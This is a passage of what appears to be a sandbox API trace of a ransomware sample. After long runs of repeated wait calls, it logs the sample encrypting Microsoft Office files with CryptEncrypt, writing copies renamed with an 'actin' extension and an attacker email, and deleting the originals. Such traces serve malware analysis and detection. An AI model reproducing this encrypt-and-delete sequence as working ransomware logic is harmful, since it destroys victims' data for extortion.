WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.149] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.149] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.150] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.150] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.150] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.150] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.150] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.150] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.150] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.150] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.150] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.150] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.150] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.150] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.150] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.150] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.151] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.151] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.151] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.151] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.151] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.151] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.151] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.151] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.151] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.151] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.151] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.151] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.151] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.152] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.152] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.152] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.152] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.152] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.152] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.152] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.152] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.152] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.152] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.152] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.152] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.152] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.153] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.153] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.153] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.153] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.153] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.153] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.154] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.154] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.154] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.154] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.154] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.154] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.154] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.154] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.154] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.154] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.154] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.154] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.154] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.155] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.155] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.155] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.155] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.155] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.155] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.155] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.155] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.155] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.155] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.155] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.155] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.155] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.156] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.156] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.156] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.156] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.156] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.156] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.156] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.156] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.156] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.156] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.156] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.156] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.156] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.157] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.157] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.157] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.157] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.157] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.157] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.157] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.157] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.157] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.157] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.157] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.157] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.157] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.158] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.158] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.158] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.158] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.158] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.158] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.158] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.158] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.158] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.158] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.158] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.158] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.158] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.159] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.159] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.159] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.159] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.159] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.159] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.159] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.159] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.159] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.159] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.159] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.159] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.159] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.159] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.160] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.160] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.160] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.160] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.160] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.160] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.160] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.160] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.160] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.160] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.160] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.160] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.160] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.161] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.161] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.161] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.161] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.161] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.161] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.161] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0047.290] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x366fea0 | out: pbBuffer=0x366fea0) returned 1 [0047.290] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DBSAMPLE.MDB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dbsample.mdb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0047.291] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x366fe38 | out: lpFileSize=0x366fe38*=507904) returned 1 [0047.291] CloseHandle (hObject=0x2e4) returned 1 [0047.292] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DBSAMPLE.MDB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dbsample.mdb")) returned 0x220 [0047.292] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DBSAMPLE.MDB.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dbsample.mdb.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.292] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DBSAMPLE.MDB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dbsample.mdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0047.292] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fdd8 | out: lpNewFilePointer=0x0) returned 1 [0047.292] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fdd8 | out: lpNewFilePointer=0x0) returned 1 [0047.292] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DBSAMPLE.MDB.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dbsample.mdb.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0047.293] CryptImportKey (in: hProv=0xf466e8, pbData=0x366fd90, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x366fdec | out: phKey=0x366fdec*=0xf71d00) returned 1 [0047.293] CryptSetKeyParam (hKey=0xf71d00, dwParam=0x1, pbData=0x366fea0, dwFlags=0x0) returned 1 [0047.293] ReadFile (in: hFile=0x2e4, lpBuffer=0x3a1c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x366fe14, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesRead=0x366fe14*=0x7c000, lpOverlapped=0x0) returned 1 [0047.310] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x7c010, dwBufLen=0x7c010 | out: pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x7c010) returned 1 [0047.311] WriteFile (in: hFile=0x330, lpBuffer=0x3a1c020*, nNumberOfBytesToWrite=0x7c010, lpNumberOfBytesWritten=0x366fdf8, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesWritten=0x366fdf8*=0x7c010, lpOverlapped=0x0) returned 1 [0047.319] CryptImportKey (in: hProv=0xf466e8, pbData=0x366fd84, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x366fdf0 | out: phKey=0x366fdf0*=0xf71d40) returned 1 [0047.319] CryptSetKeyParam (hKey=0xf71d40, dwParam=0x1, pbData=0x366fea0, dwFlags=0x0) returned 1 [0047.319] CryptEncrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x40, dwBufLen=0x40 | out: pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x40) returned 1 [0047.319] CryptDestroyKey (hKey=0xf71d40) returned 1 [0047.319] WriteFile (in: hFile=0x330, lpBuffer=0x3a1c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x366fdf8, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesWritten=0x366fdf8*=0xf2, lpOverlapped=0x0) returned 1 [0047.319] CryptDestroyKey (hKey=0xf71d00) returned 1 [0047.319] CloseHandle (hObject=0x2e4) returned 1 [0047.319] CloseHandle (hObject=0x330) returned 1 [0047.477] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DBSAMPLE.MDB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dbsample.mdb")) returned 1 [0047.481] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x366fea0 | out: pbBuffer=0x366fea0) returned 1 [0047.481] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZMAIN.ACCDE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzmain.accde"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0047.483] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x366fe38 | out: lpFileSize=0x366fe38*=9277440) returned 1 [0047.483] CloseHandle (hObject=0x330) returned 1 [0047.483] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZMAIN.ACCDE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzmain.accde")) returned 0x220 [0047.483] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZMAIN.ACCDE.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzmain.accde.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.483] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZMAIN.ACCDE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzmain.accde"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0047.484] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fdd8 | out: lpNewFilePointer=0x0) returned 1 [0047.484] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x366fdd8 | out: lpNewFilePointer=0x0) returned 1 [0047.484] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZMAIN.ACCDE.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzmain.accde.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0047.484] CryptImportKey (in: hProv=0xf466e8, pbData=0x366fd90, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x366fdec | out: phKey=0x366fdec*=0xf71f40) returned 1 [0047.484] CryptSetKeyParam (hKey=0xf71f40, dwParam=0x1, pbData=0x366fea0, dwFlags=0x0) returned 1 [0047.484] ReadFile (in: hFile=0x330, lpBuffer=0x3a1c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x366fe14, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesRead=0x366fe14*=0x110100, lpOverlapped=0x0) returned 1 [0047.503] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x110100, dwBufLen=0x110100 | out: pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x110100) returned 1 [0047.516] WriteFile (in: hFile=0x33c, lpBuffer=0x3a1c020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x366fdf8, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesWritten=0x366fdf8*=0x110100, lpOverlapped=0x0) returned 1 [0047.703] ReadFile (in: hFile=0x330, lpBuffer=0x3a1c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x366fe14, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesRead=0x366fe14*=0x110100, lpOverlapped=0x0) returned 1 [0047.720] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x110100, dwBufLen=0x110100 | out: pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x110100) returned 1 [0047.721] WriteFile (in: hFile=0x33c, lpBuffer=0x3a1c020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x366fdf8, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesWritten=0x366fdf8*=0x110100, lpOverlapped=0x0) returned 1 [0047.770] ReadFile (in: hFile=0x330, lpBuffer=0x3a1c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x366fe14, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesRead=0x366fe14*=0x110100, lpOverlapped=0x0) returned 1 [0048.011] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x110100, dwBufLen=0x110100 | out: pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x110100) returned 1 [0048.012] WriteFile (in: hFile=0x33c, lpBuffer=0x3a1c020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x366fdf8, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesWritten=0x366fdf8*=0x110100, lpOverlapped=0x0) returned 1 [0048.039] ReadFile (in: hFile=0x330, lpBuffer=0x3a1c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x366fe14, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesRead=0x366fe14*=0x110100, lpOverlapped=0x0) returned 1 [0048.503] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x110100, dwBufLen=0x110100 | out: pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x110100) returned 1 [0048.505] WriteFile (in: hFile=0x33c, lpBuffer=0x3a1c020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x366fdf8, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesWritten=0x366fdf8*=0x110100, lpOverlapped=0x0) returned 1 [0049.050] ReadFile (in: hFile=0x330, lpBuffer=0x3a1c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x366fe14, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesRead=0x366fe14*=0x110100, lpOverlapped=0x0) returned 1 [0049.062] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x110100, dwBufLen=0x110100 | out: pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x110100) returned 1 [0049.063] WriteFile (in: hFile=0x33c, lpBuffer=0x3a1c020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x366fdf8, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesWritten=0x366fdf8*=0x110100, lpOverlapped=0x0) returned 1 [0049.084] ReadFile (in: hFile=0x330, lpBuffer=0x3a1c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x366fe14, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesRead=0x366fe14*=0x110100, lpOverlapped=0x0) returned 1 [0049.467] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x110100, dwBufLen=0x110100 | out: pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x110100) returned 1 [0049.468] WriteFile (in: hFile=0x33c, lpBuffer=0x3a1c020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x366fdf8, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesWritten=0x366fdf8*=0x110100, lpOverlapped=0x0) returned 1 [0049.489] ReadFile (in: hFile=0x330, lpBuffer=0x3a1c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x366fe14, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesRead=0x366fe14*=0x110100, lpOverlapped=0x0) returned 1 [0049.719] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x110100, dwBufLen=0x110100 | out: pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x110100) returned 1 [0049.720] WriteFile (in: hFile=0x33c, lpBuffer=0x3a1c020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x366fdf8, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesWritten=0x366fdf8*=0x110100, lpOverlapped=0x0) returned 1 [0049.742] ReadFile (in: hFile=0x330, lpBuffer=0x3a1c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x366fe14, lpOverlapped=0x0 | out: lpBuffer=0x3a1c020*, lpNumberOfBytesRead=0x366fe14*=0x110100, lpOverlapped=0x0) returned 1 [0049.752] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x110100, dwBufLen=0x110100 | out: pbData=0x3a1c020*, pdwDataLen=0x366fdb0*=0x110100) returned 1 [0049.754] WriteFile (in: 